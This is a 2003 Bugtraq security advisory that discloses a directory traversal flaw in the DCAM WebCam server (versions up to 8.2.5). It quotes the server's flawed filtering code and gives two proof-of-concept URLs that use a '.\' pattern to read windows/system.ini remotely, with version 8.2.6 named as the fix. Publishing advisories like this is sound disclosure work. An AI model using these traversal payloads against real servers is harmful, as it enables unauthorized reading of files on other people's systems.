Directory traversal bug in DCAM server <= 8.2.5

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Directory traversal bug in DCAM server <= 8.2.5
From: Luigi Auriemma <aluigi@xxxxxxxxxxxxxx>
Date: Mon, 22 Dec 2003 17:42:58 +0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

#######################################################################

                             Luigi Auriemma

Application:  DCAM WebCam server
              http://www.hyperionx.com
              http://sourceforge.net/projects/dcamserver/
Versions:     <= 8.2.5
Platforms:    Windows
Bug:          Directory traversal bug
Risk:         high
Exploitation: remote with browser
Date:         22 Dec 2003
Author:       Luigi Auriemma
              e-mail: aluigi@xxxxxxxxxxxxxx
              web:    http://aluigi.altervista.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


DCAM WebCam Server is an OpenSource program written in VisualBasic that
allows to capture live streaming video and to broadcast it on the web
through the built-in webserver.



#######################################################################

======
2) Bug
======


The webserver built into DCAM uses a protection to avoid the directory
traversal bug.
We can see it in Form1.frm:

...
880    page = Replace(page, "..", "")
881    page = Replace(page, "./", "")
882    page = Replace(page, "/.", "")
883    page = Replace(page, "//", "")
884    page = Replace(page, "\", "")
...

The problem happens when the attacker uses the pattern ".\" that
deceives the checks and allows him to see and download any file in the
remote system knowing the path.



#######################################################################

===========
3) The Code
===========


http://server/.\.\.\.\/windows/system.ini
http://server/.\.\.\.\.\.\.\.\.\.\/windows/system.ini



#######################################################################

======
4) Fix
======


Version 8.2.6


#######################################################################


--- 
Luigi Auriemma
http://aluigi.altervista.org

Prev by Date: Re: Remote crash in tcpdump from OpenBSD
Next by Date: An undetectable Online Bank Vulnerability?
Previous by thread: CesarFTP v0.99g CPU OverLoad [Proof of concept]
Next by thread: An undetectable Online Bank Vulnerability?
Index(es):
- Date
- Thread